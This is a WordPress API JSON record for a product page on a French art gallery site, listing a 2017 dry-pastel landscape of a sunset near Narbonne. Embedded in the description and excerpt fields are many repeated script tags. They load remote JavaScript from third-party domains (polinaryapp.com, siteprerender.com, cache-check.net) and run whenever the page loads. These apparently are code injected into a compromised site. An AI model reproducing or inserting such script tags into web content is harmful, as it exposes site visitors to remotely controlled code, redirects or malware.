{"id":1872,"date":"2020-12-12T19:11:51","date_gmt":"2020-12-12T18:11:51","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=1872"},"modified":"2020-12-12T19:29:30","modified_gmt":"2020-12-12T18:29:30","slug":"coucher-du-soleil-pres-de-narbonne-11-pastels-secs","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/","title":{"rendered":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue du tableau:<\/span><\/p>\n<p><span style=\"color: #000000;\">Coucher du soleil, pr\u00e8s de Narbonne (11), paysage aux pastels secs et fusain d&rsquo;apr\u00e8s la photo de l&rsquo;artiste.<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2017.<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 40 x 50 cm.<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu encadr\u00e9 et avec un passe-partout pour pastels secs.<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607796717227\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_306530670&amp;key=21ecefdd84a1d2a730&amp;cv=1607797760&amp;t=1607797760690\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_672302173&amp;key=21ecefdd84a1d2a730&amp;cv=588372&amp;t=1607797760690\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607797760697\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\"><strong>Coucher du soleil, pr\u00e8s de Narbonne (11)<\/strong>, paysage aux pastels secs et fusain<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2017.<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 40 x 50 cm.<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607796691733\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607796717309\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_978713418&amp;key=21ecefdd84a1d2a730&amp;cv=1607797760&amp;t=1607797760939\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_301614533&amp;key=21ecefdd84a1d2a730&amp;cv=588372&amp;t=1607797760940\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607797760944\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1855,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-1872","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","5":"hentry","6":"product_cat-paysages-aux-pastels","8":"entry","9":"has-media","10":"owp-thumbs-layout-horizontal","11":"owp-btn-normal","12":"owp-tabs-layout-vertical","13":"has-no-thumbnails","14":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Coucher du soleil, pr\u00e8s de Narbonne (11), paysage aux pastels secs et fusain  R\u00e9alis\u00e9 en 2017.  Dimensions: 40 x 50 cm.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-12T18:29:30+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"500\" \/>\n\t<meta property=\"og:image:height\" content=\"331\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/\",\"name\":\"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg\",\"datePublished\":\"2020-12-12T18:11:51+00:00\",\"dateModified\":\"2020-12-12T18:29:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg\",\"width\":500,\"height\":331,\"caption\":\"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs, 2017\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/","og_locale":"fr_FR","og_type":"article","og_title":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Coucher du soleil, pr\u00e8s de Narbonne (11), paysage aux pastels secs et fusain  R\u00e9alis\u00e9 en 2017.  Dimensions: 40 x 50 cm.","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-12T18:29:30+00:00","og_image":[{"width":500,"height":331,"url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/","name":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage"},"image":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage"},"thumbnailUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg","datePublished":"2020-12-12T18:11:51+00:00","dateModified":"2020-12-12T18:29:30+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#primaryimage","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170224_162504.jpg","width":500,"height":331,"caption":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs, 2017"},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/coucher-du-soleil-pres-de-narbonne-11-pastels-secs\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Coucher du soleil, pr\u00e8s de Narbonne (11), pastels secs"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/1872","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media\/1855"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=1872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}